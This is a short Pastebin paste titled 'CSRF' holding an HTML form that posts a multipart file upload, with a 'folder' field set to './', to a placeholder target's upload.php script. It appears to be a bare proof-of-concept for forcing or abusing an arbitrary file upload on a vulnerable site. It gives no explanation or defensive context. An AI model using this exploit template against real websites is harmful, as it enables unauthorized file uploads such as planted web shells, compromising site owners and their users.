Advertisement
Guest User

CSRF

a guest
Nov 13th, 2016
384
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.25 KB | None | 0 0
  1. <form enctype="multipart/form-data"
  2. action="www.targetmu/path/upload.php" method="post">
  3. <input type="text" name="folder" value="./" /><br />
  4. Please choose a file: <input name="Filedata" type="file" /><br />
  5. <input type="submit" value="upload" />
  6. </form>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement